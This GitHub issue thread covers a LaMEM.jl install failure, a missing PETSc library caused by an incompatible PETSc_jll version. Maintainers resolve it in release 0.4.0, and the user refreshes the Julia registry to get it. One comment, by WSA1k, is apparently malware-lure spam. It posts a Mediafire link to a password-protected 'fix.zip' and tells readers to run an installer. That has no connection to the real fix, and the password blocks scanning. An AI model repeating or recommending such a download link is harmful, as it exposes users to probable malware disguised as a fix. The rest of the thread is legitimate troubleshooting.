### ISSUE TITLE
Missing library

### ISSUE THREAD

**Issue by ArneSpang** [JuliaGeodynamics/LaMEM.jl#59]
I installed this on Julia 1.10.3 today and when trying to use it, I get an error about a missing Petsc package:
``` julia
julia> using LaMEM
Precompiling LaMEM
        Info Given LaMEM was explicitly requested, output will be shown live 
ERROR: LoadError: InitError: could not load library "/home/arne/.julia/artifacts/d21c752f888a6e42c61116236622d2db4d305eae/lib/LaMEMLib.so"
libpetsc_double_real_Int32_double_real_Int32.so.3.18: cannot open shared object file: No such file or directory
```

LaMEM.jl is version v0.3.8

On Julia 1.9.4, it worked but was missing superlu as also pointed out in this issue: https://github.com/JuliaGeodynamics/LaMEM.jl/issues/51

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by boriskaus** [comment]
which version of `PETSc_jll` was it trying to install? version 3.19.6 was merged yesterday, I'm just testing a newer version of LaMEM.

**Comment by ArneSpang** [comment]
> which version of `PETSc_jll` was it trying to install? version 3.19.6 was merged yesterday, I'm just testing a newer version of LaMEM.

Yes, 3.19.6

**Comment by boriskaus** [comment]
that's the issue because `LaMEM.jl` is compatible with 3.18.x only. Let me try and push a fix

**Comment by ArneSpang** [comment]
> that's the issue because `LaMEM.jl` is compatible with 3.18.x only. Let me try and push a fix

I don't need a quick fix, just wanted to point it out. I managed to do what I needed to do with it.

**Comment by boriskaus** [comment]
ok, LaMEM version 2.1.4 should fix this, and bring back MUMPS and SuperLU_Dist on Mac and Linux

**Comment by boriskaus** [comment]
Can you try if `LaMEM.jl` version 0.4.0 (just released) solves the issue for you?

**Comment by ArneSpang** [comment]
> Can you try if `LaMEM.jl` version 0.4.0 (just released) solves the issue for you?

I can see on Github that 0.4.0 is released but when I try to install it in package manager, it says that 0.3.8 is still the newest. If I try to force 0.4.0, it says that it does not exist. I guess I will have to wait a bit

**Comment by boriskaus** [comment]
or you delete the directory:
```
.julia/registries/
```
on your computer, which will force-download a new version of the Julia registry which will have version 0.4.0

**Comment by ArneSpang** [comment]
Ok that worked. v0.4.0 solved both issues. The library error and superlu issue
